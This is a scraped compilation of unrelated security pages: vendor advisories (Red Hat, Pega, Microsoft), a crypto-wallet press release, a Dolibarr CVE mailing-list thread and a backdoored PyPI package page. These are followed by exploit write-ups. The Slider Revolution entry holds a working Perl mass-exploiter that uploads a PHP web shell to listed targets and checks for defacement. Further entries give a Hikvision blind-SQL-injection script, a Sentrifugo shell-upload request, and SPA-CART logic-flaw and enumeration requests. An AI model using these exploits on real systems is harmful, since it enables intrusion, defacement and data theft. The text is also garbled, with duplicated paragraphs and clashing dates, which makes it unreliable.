Red Hat OpenShift Container Platform release 4.7.13 is now available with updates to packages and images that fix several bugs.
This release includes a security update for Red Hat OpenShift Container Platform 4.7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2021:2122
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
This update fixes the following bug among others:
* Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238)
Security Fix(es):
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64
The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x
The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le
The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36
All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available
at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-between-minor.html#understanding-upgrade-channels_updating-cluster-between-minor
Related CVEs:
* CVE-2021-3121: gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation


RHSA-2021:2121: Red Hat Security Advisory: OpenShift Container Platform 4.7.13 bug fix and security update

**CAMPBELL, Calif.****,** **Jan. 5, 2023** **/PRNewswire/ --** iCoin Technology, a U.S. based manufacturer of modern crypto hardware wallets, announced today that it will be adding a secure messaging feature to their existing hardware wallet system for cryptocurrency

"One of the problems with existing secure messaging platforms is that they rely on central severs to control message flow and storage.  These central severs can be compromised by external or internal threats, including password reset requests.  Also, the smartphones or laptops that are used as message endpoints are network connected devices and run multiple applications - which can also expose the messages to attacks.  By encrypting and decrypting the messages only on a cold device, like the iCoin hardware wallet, can the users be sure that no one can intercept and read the messages between the sender and receiver." - Chet Silvestri, CEO, iCoin Technology

The iCoin hardware wallet is a cold device which is never directly connected to a network.  The encryption keys are created and stored only within the hardware wallet and can never be extracted.  The messages are directly entered into the hardware wallet and encrypted before ever leaving the wallet.  The pre-encrypted messages can then be sent over public messaging systems and are tamperproof.

The Secure Messaging feature will be integrated into the iCoin hardware wallet beginning in April 2023 and will also available as a no-cost firmware upgrade for existing iCoin hardware wallet owners at the same time.

"My quote from decades ago of "You have no privacy. Get over it!" has certainly stood the test of time.  But we can and must try to fight back.  The iCoin hardware encrypted secure messaging system will allow users to regain some control of their privacy when it comes to personal communications.   Both Enterprises and Consumers can now use the iCoin system to bring a new level of security to internet-based communication." - Scott McNealy, former CEO and Founder, Sun Microsystems, Inc.

**About iCoin Technology**

Headquartered in Silicon Valley, iCoin Technology is a pioneer of a new class of hardware wallets for the digital economy, blending consumer-grade ease-of-use with industrial-strength security.

Learn more at https://www.icointechnology.com/ or follow us on Linkedin, twitter, or Instagram.

SOURCE iCoin Technology

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

US Based ICOIN Technology Announces Secure Messaging Solution Using Hardware Wallet Encryption

Today we published the April 2013 Security Bulletin Webcast Questions & Answers page. We answered 13 questions in total, with the majority focusing on the update for Internet Explorer (MS14-018) and the Windows 8.1 Update (KB2919355). Two questions that were not answered on air have been included on the Q&A page.

Today we published the April 2013 Security Bulletin Webcast Questions & Answers page. We answered 13 questions in total, with the majority focusing on the update for Internet Explorer (MS14-018) and the Windows 8.1 Update (KB2919355). Two questions that were not answered on air have been included on the Q&A page.

Here is the video replay.

For those of you following the ongoing investigation around the industry-wide issue known as “Heartbleed,” please refer to this post on the Microsoft Security Blog for the status of our investigation.

We invite you to join us for the next scheduled webcast on Wednesday, May 14, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the May bulletin release and answer your bulletin deployment questions live on the air.

You can register to attend the webcast at the link below:

**Date: Wednesday, May 14, 2014 Time: 11:00 a.m. PDT (UTC -7)  
Register:** **Attendee Registration**

I look forward to seeing you next month.

Thanks,  
Dustin Childs  
Group Manager, Response Communications  
Microsoft Trustworthy Computing

April 2014 Security Bulletin Webcast and Q&A

Misconfiguration of the Pega Chat Access Group portal in Pega platform 7.4.0 - 8.5.x could lead to unintended data exposure.

Pega continually works to implement security controls designed to protect client environments.  As part of that effort, Pega has issued a CVE regarding the possibility of misconfiguring Pega Chat and Pega Intelligent Virtual Assistant (IVA) in a way that could lead to unintended data and system exposure.

**CVE Details:**

**Software/Product**: Pega Infinity

**Version**: 7.4.0-8.5.x

**CVE ID**: CVE-2021-27653

**Title**: Misconfiguration of the Pega Chat Access Group portal in Pega platform 7.4.0 - 8.5.x could lead to unintended data exposure.

If one of your current Pega installations leverages Pega Chat or the chat functionality as part of Pega Intelligent Virtual Assistant (IVA), please check for the following condition: 

_Pega Chat ships with a blank or empty portal definition in the CSSelfServiceUser access group. If your organization has changed or customized the access group portal, ensure the activated portal is also blank or empty, meaning it contains no harness or section definitions whatsoever._

We do not anticipate many clients have misconfigured their system in this way, however, we are issuing the CVE on short notice due to the possible risk of accidentally exposing your portal to unauthorized users in the event it was not set with a blank or empty portal definition.

As always, we recommend our customers review our **Security Checklist** regularly.

The following are additional details on how to check if you have the proper configuration. 

*   The access group referenced above is the access group that is associated with the template operator specified in the Webchat Channel rule.
*   The possible misconfiguration reference to Pega Intelligent Virtual Assistant (IVA) relates to the Web Chatbot channel only.

Please see below for an example of the Pega Chat configuration as shipped out of the box.

Fig.1: An example of the out of the box Template operator record as shown from the Web Chatbot channel on the connection tab:

![Screenshot](https://collaborate.pega.com/sites/default/files/collaboration/inline-images/Picture1_11.png)

Fig. 2: The actual operator record:

![Screenshot](https://collaborate.pega.com/sites/default/files/collaboration/inline-images/Picture2_5.png)

Fig. 3: The Access Group for the operator:

![Screenshot](https://collaborate.pega.com/sites/default/files/collaboration/inline-images/Picture3_5.png)

Fig. 4: The portal as defined (notice the harness name):

![Screenshot](https://collaborate.pega.com/sites/default/files/collaboration/inline-images/Picture4_4.png)

Fig. 5: The “Empty” Harness (note the harness is not truly empty, but contains no links leading away from the portal):

![Screenshot](https://collaborate.pega.com/sites/default/files/collaboration/inline-images/Picture5_3.png)

CVE-2021-27653: Collaboration Center

SQL injection vulnerability in Dolibarr ERP/CRM 3.3.1 allows remote attackers to execute arbitrary SQL commands via the 'pays' parameter in fiche.php.

* Products
 * Openwall GNU/\*/Linux   _server OS_
 * Linux Kernel Runtime Guard
 * John the Ripper   _password cracker_
 * Free & Open Source for any platform
 * in the cloud
 * Pro for Linux
 * Pro for macOS
 * Wordlists   _for password cracking_
 * passwdqc   _policy enforcement_
 * Free & Open Source for Unix
 * Pro for Windows (Active Directory)
 * yescrypt   _KDF & password hashing_
 * yespower   _Proof-of-Work (PoW)_
 * crypt\_blowfish   _password hashing_
 * phpass   _ditto in PHP_
 * tcb   _better password shadowing_
 * Pluggable Authentication Modules
 * scanlogd   _port scan detector_
 * popa3d   _tiny POP3 daemon_
 * blists   _web interface to mailing lists_
 * msulogin   _single user mode login_
 * php\_mt\_seed   _mt\_rand() cracker_
* Services
* Publications
 * Articles
 * Presentations
* Resources
 * Mailing lists
 * Community wiki
 * Source code repositories (GitHub)
 * Source code repositories (CVSweb)
 * File archive & mirrors
 * How to verify digital signatures
 * OVE IDs
* What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 14 May 2013 01:07:07 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: chevalier 3as <chevalier3as@...il.com>,
 Florian HENRY <florian.henry@...n-concept.pro>
Subject: Re: Re: CVE Request: Dolibarr - Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/11/2013 01:11 PM, chevalier 3as wrote:
> I've failed to mention command injection, fix can be found here:
> 
> https://github.com/Dolibarr/dolibarr/commit/526a80dd202bbca396687a502d52c27e06e97fff

Please
> 
use CVE-2013-2093 for Dolibarr command injection


> 2013/5/11 chevalier 3as <chevalier3as@...il.com>
> 
>> Hello Kurt, Steve, All,
>> 
>> I'd like to request a CVE for two vulnerabilties in Dolibarr 3.3
>> and 3.4:
>> 
>> 1- SQL injection in 'pays' parameter, correction details can be
>> found here:
>> 
>> 
>> https://github.com/Dolibarr/dolibarr/commit/9427e32e2ed54c1a2bc519a88c057207836df489

Please
>> 
use CVE-2013-2091 for Dolibarr SQL injection in 'pays' parameter

>> 
>> 2- XSS vulnerabilty in several parameters, correction details can
>> be found here:
>> 
>> 
>> https://github.com/Dolibarr/dolibarr/commit/8a90598b23e1b2689848187941f7a96b04907005

Please
>> 
use CVE-2013-2092 for Dolibarr XSS vulnerabilty in several
parameters

>> Cheers, Alaeddine Mesbahi



- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRkeKbAAoJEBYNRVNeJnmTq0QQAJsGFL9tU9tldK8G4SZJmCo8
N6x8oVBY4GKNsXwrQWQyjmJTiSYDZG9JvjS9ZP7NtKQ+mO0Ujofy8+nySR76/55u
xuhUgzWasG/zWtbVVrlTTV8UXyjNKLRCv9xHu+O/5CqgHDDe4Sc5EswqR3XpiV12
3dVhpPyqaapkw3E5kkQYDQXnQdUsLznjtWbIngljjjQxGAlDN09I0bBszi1K/PRZ
TTj3J1qcT+oHjxSupWy4BftOe4A7nj/rSMHZ5jPRUOx58iR5h5t4k36jLPgYAzUX
muEkt51j4RE9XPyb/zQXa7RZLh8QpudpLElLxPPXY7fg1InUVNqKDjHDP+NG7eTX
ju0bDlkaTDyDf9JM/uCvg8mWHcS0rdxqOD6HSxizQmvadpGejzEcAzmSMk67XuuD
/RKgBpGs4A428hx3AApS7OxMMTIxyKXXkCl/Mj6Glu0IKtusCJaZzAy5yJc5s16v
9cISObNuNffzVS461k1TjHMlMftiI8/26I55KKNFZVXvijcGt9XR/ekF9puM/R/1
IMCz9lNSU4v+40ZhdoTpjToR7qiSD3EC05iPDICm9Vu79L7sIG4ZcBgkGXuUdiSp
Es5YXLqype+vqZvnJGYHlRS07OK9Q1fOBkIiSVS3BW/Xq044ukP1c/DgiLeWUKh0
1xzaw++50ZNDcevQ+U6q
=D+FC
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2013-2091: oss-security - Re: Re: CVE Request: Dolibarr

The d8s-domains package for Python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-urls package. The affected version is 0.1.0.

**Project description**

**Democritus Domains**

      

Democritus functions\[1\] for working with domains.

\[1\] Democritus functions are _simple, effective, modular, well-tested, and well-documented_ Python functions.

We use d8s (pronounced "dee-eights") as an abbreviation for democritus (you can read more about this here).

**Installation**

    pip install d8s-domains
    

**Usage**

You import the library like:

from d8s\_domains import \*

Once imported, you can use any of the functions listed below.

**Functions**

*   def is\_domain(possible\_domain: str) \-> bool:
        """Check if the given string is a domain."""
    
*   def domain\_examples(n: int \= 10) \-> List\[str\]:
        """Create n domain names."""
    
*   def domains\_find(text: str, \*\*kwargs: bool) \-> List\[str\]:
        """Parse domain names from the given text."""
    
*   def domain\_dns(domain: str) \-> str:
        """Get the DNS results for the given domain."""
    
*   def domain\_certificate\_peers(domain: str) \-> List\[str\]:
        """Return a list of all domains sharing a certificate with the given domain."""
    
*   def domain\_whois(domain: str) \-> Optional\[Dict\[str, Any\]\]:
        """."""
    
*   def domain\_subdomains(domain\_name: str) \-> str:
        """Get the subdomains for the given domain name."""
    
*   def domain\_second\_level\_name(domain\_name: str) \-> str:
        """Get the second level name for the given domain name (e.g. google from https://google.co.uk)."""
    
*   def domain\_tld(domain\_name: str) \-> str:
        """Get the top level domain for the given domain name."""
    
*   def domain\_rank(domain\_name: str) \-> int:
        """."""
    
*   def domain\_is\_member(domain\_to\_check: str, domain\_base: str) \-> bool:
        """Given two domains, check if the first domain is a member of the second domain.
    A member means it is either the domain itself, or a subdomain of the domain."""
    
*   def domain\_as\_punycode(domain\_name: str) \-> str:
        """Convert the given domain name to Punycode (https://en.wikipedia.org/wiki/Punycode)."""
    
*   def domain\_as\_unicode(domain\_name: str) \-> str:
        """Convert a given domain name to Unicode (https://en.wikipedia.org/wiki/Unicode)."""
    
*   def tlds() \-> List\[str\]:
        """Get the top level domains from https://iana.org/."""
    
*   def is\_tld(possible\_tld: str) \-> bool:
        """Return whether or not the possible\_tld is a valid tld."""
    

**Development**

👋  If you want to get involved in this project, we have some short, helpful guides below:

*   contribute to this project 🥇
*   test it 🧪
*   lint it 🧹
*   explore it 🔭

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

**Credits**

This package was created with Cookiecutter and Floyd Hightower's Python project template.

**Download files**

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

**Source Distribution****Built Distribution**

CVE-2022-41384: d8s-domains

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

================================================================================================= 
| # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit | 
| # Author : indoushka | 
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | 
| # Vendor : https://www.sliderrevolution.com/ | 
| # Dork : index off revslider\backup | 
 plugins/revslider/public/assets/css/settings.css | 
 revslider.php "index of" | 
 wp-content/plugins/revslider/ 2013 | 
=================================================================================================

[+] poc :

[+] Web shell upload :

 The following perl exploit will attempt to upload backdoor through the update_plugin function 
 To use the exploit, be sure to compress the backdoor file with name [revslider.zip] 
 Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension 
 Because the exploit uploads a compressed file to the target

 [+] simple backdoor :

 <?php 
 $cmd = $_GET['cmd']; 
 system($cmd); 
 ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl

 use LWP::UserAgent;

 system(($^O eq 'MSWin32') ? 'cls' : 'clear');

 head();

 my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt"; 
die "$usage" unless $ARGV[0];

 open(tarrget,"<$ARGV[0]") or die "$!"; 
while(<tarrget>){ 
chomp($_); 
$target = $_;

 my $path = "wp-admin/admin-ajax.php";

 print "\nTarget => $target\n";

 my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); 
$ua->timeout(10); 
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); 
my $req = $ua->get("$target/$path"); 
if($req->is_success) { 
print "\n [+] Xploit Possibility Work :3\n \n";

 print " [*] Try Exploiting Vulnerability\n"; 
print " [*] Xploiting $target\n";

 my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

 print " [*] Sent payload\n";

 if ($exploit->decoded_content =~ /Wrong update extracted folder/) { 
print " [+] Payload successfully executed\n";

 print " [*] Checking if shell was uploaded\n"; 
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content; 
if($check =~/ /) {

 print " [+] Shell successfully uploaded\n"; 
 open(save, '>>Shell.txt'); 
 print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n"; 
 close(save);

 print " [*] Checking if Deface was uploaded now\n";

 my $def = $ua->get("$target/leet.html")->content; 
if($def = ~/Hacked/) {

 print " [+] Deface uploaded successfull\n";

 } else {print " [-] Deface not Uploaded :/"; } 
} else { print " [-] I'think Shell Not Uploaded :/\n"; } 
} else { 
print " [-] Payload failed: Fail\n"; 
print "\n";

 } 
} else { print "\n [-]Xploit Fail \n"}

 sub head { 
print "\t +===============================================\n"; 
print "\t | Auto Exploiter Revslider Shell Upload \n"; 
print "\t | Edited: indoushka\n"; 
print "\t +===============================================\n"; 
} 
}

Greetings to :========================================================================================================================= 
 | 
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | 
 | 
=======================================================================================================================================

WordPress Slider Revolution 4.x.x Shell Upload

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

In Sentrifugo 3.5, the AssetsController::uploadsaveAction function allows an authenticated attacker to upload any file without extension filtering.

**Bug: Authenticated - Unrestricted file upload****Description**

The AssetsController::uploadsaveAction function allows an authenticated attacker to upload any file without extension filtering.

**Vulnerability Detail**

The uploadsaveAction function allows an attacker to take full control of the extension and save it to ASSETS_IMAGES_TEMP_PATH

/\* /application/modules/assets/controllers/AssetsController.php \*/
public function uploadsaveAction()
	{
			
		$assetsModel = new Assets\_Model\_Assets();
		$user\_id = sapp\_Global::\_readSession('id');
		$image;
 $filedata = array();
 	// Validate file with size greater than default(Upload Max Filesize)limit
 if ($\_FILES\["myfile"\]\["size"\] == 0 || $\_FILES\["myfile"\]\["size"\] > (2\*1024\*1024)) 
			{
				$this\->\_helper\->json(array('error' => 'filesize'));
			}
		else if(isset($\_FILES\["myfile"\])) {
 $fileName = $\_FILES\["myfile"\]\["name"\];
			$image = $fileName;
 $fileName = preg\_replace('/\[^a-zA-Z0-9.\\'\]/', '\_', $fileName);			 	
 $newName = time().'\_'.$user\_id.'\_'.str\_replace(' ', '\_', $fileName); 
 $filedata\['original\_name'\] = $fileName;
 $filedata\['new\_name'\] = $newName;
			$file\_type\_array = explode('.',$filedata\['original\_name'\]);
			$file\_type = $file\_type\_array\[1\];
			
			
			move\_uploaded\_file($\_FILES\["myfile"\]\["tmp\_name"\],ASSETS\_IMAGES\_TEMP\_PATH.$newName);
 ...

**Proof of concept**

REQUEST:

 POST /sentrifugo/index.php/assets/assets/uploadsave HTTP/2
 Host: localhost:8888
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
 Cookie: PHPSESSID=4c6885df75ee21adc859130d344ad10e
 Content-Type: multipart/form-data; boundary=---------------------------105724483522942151783772139738
 Content-Length: 256
 
 
 -----------------------------105724483522942151783772139738
 Content-Disposition: form-data; name="myfile"; filename="shell.php"
 Content-Type: image/jpeg
 
 <?php
 	system($_GET["cmd"]);
 ?>
 -----------------------------105724483522942151783772139738--
 
 

RESPONSE:

 HTTP/1.1 200 OK
 Date: Wed, 08 Mar 2023 06:41:21 GMT
 Server: Apache/2.2.29 (Unix) mod_wsgi/3.5 Python/2.7.10 PHP/5.6.10 mod_ssl/2.2.29 OpenSSL/0.9.8zh DAV/2 mod_fastcgi/2.4.6 mod_perl/2.0.9 Perl/v5.22.0
 X-Powered-By: PHP/5.6.10
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 78
 Connection: close
 Content-Type: text/html;charset=UTF-8
 
 {"filedata":{"original_name":"shell.php","new_name":"1678257682_1_shell.php"}}
 

 

**Solution**

* Validate file type: Ensure that the uploaded file matches the expected file type and size limit. This can be done by checking the file extension or using a file type validation library.
* Sanitize file names: Ensure that the file names are sanitized to prevent directory traversal attacks. This involves removing any special characters, whitespace, and other potentially harmful characters.
* Store files outside the webroot: Store uploaded files outside of the web application's root directory to prevent them from being executed as scripts..
* Implement access controls: Implement access controls to ensure that only authorized users can upload files. This can include requiring authentication, setting permissions, and limiting upload privileges.

**Acknowledgement**

nhienit at bl4ckh0l3 from Galaxy One

CVE-2023-29770: Authenticated - Unrestricted file upload · Issue #384 · sapplica/sentrifugo

SPA-CART CMS version 1.9.0.6 suffers from business logic and user enumeration flaws.

# Exploit Title: Business Logic Flaw and Username Enumeration in 
spa-cartcmsv1.9.0.6 
# Date: 6/2024 
# Exploit Author: Andrey Stoykov 
# Version: 1.9.0.6 
# Tested on: Ubuntu 22.04 
# Blog: 
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html 
<http://msecureltd.blogspot.com/>

Description

- It was found that the application suffers from business logic flaw

- Additionally the application is vulnerable to username enumeration on the 
login page

Logic Flaw

Steps to Reproduce:

 1. Checkout page and intercept HTTP POST request 
 2. Add minus quantity such as -10 
 3. The final price would come up as negative value

// HTTP POST request modifying the quantity to negative value

POST /cart/add HTTP/2 
Host: demo.spa-cart.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/123.0.6312.122 
[...]

productid=225&amount=-10

// HTTP response

HTTP/2 200 OK 
Server: nginx 
[...]

[...] 
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg" 
alt="" />Five And Two Jewelry Piper Gold-Plated Earrings added to 
cart 
 
Price: $59.00 
<div class="added_options"> 
Selected options: 
Qty: 1 
Color: silver gold 
</div> 
[...]

// HTTP GET request to checkout

GET /checkout HTTP/2 
Host: demo.spa-cart.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/123.0.6312.122 
[...]

// HTTP response showing negative amount owned

HTTP/2 200 OK 
Server: nginx 
[...]

[...] 
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td 
class=\"line\" nowrap align=\"right\">\r\n$<\/span>59.00 x -10 = 
$<\/span>-590.00 <\/td> 
[...]

Username Enumeration:

Steps to Reproduce:

 1. Register account 
 2. Enter valid account with wrong password 
 3. Trap HTTP request 
 4. Check that response for valid username has "P" message 
 5. Enter invalid account with wrong password 
 6. Check that response for invalid username has "E" message

// HTTP POST request with valid username and wrong password

POST /login HTTP/2 
Host: demo.spa-cart.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 
[...]

email=test%40test.test&password=test123

// HTTP response showing "P" error message

HTTP/2 200 OK 
Server: nginx 
[...]

P

// HTTP POST request with invalid username and wrong password

POST /login HTTP/2 
Host: demo.spa-cart.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 
[...]

email=test%40test.t3st&password=test123

// HTTP response showing "E" error message

HTTP/2 200 OK 
Server: nginx 
[...]

E

Search

lenovo warranty check/lookup | check warranty status | lenovo support us